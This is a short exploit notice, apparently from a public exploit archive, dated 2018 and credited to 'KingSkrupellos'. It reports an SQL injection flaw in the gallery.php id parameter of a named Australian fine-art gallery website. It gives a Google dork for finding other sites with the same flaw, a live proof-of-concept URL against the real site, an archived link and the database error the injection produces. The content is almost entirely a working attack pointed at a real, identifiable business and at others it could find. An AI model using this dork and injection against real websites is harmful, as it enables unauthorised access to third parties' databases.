#################################################################################################
# Exploit Title : Melbourne FineArt Gallery Australia SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 29/05/2018
# Vendor Homepage : melbournefineart.com.au
# Tested On : Windows
# Exploit Risk : Medium
# CWE: CWE-89
#################################################################################################
# Google Dork : inurl:''/gallery.php?id='' site:com.au
# Exploit : /gallery.php?id=[SQL Injection ]
# Example Site => melbournefineart.com.au/gallery.php?id=18%27 [ Proof of Concept for SQL Injection ] => archive.is/heFX2
# SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by image_order limit 1' at line 1]
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################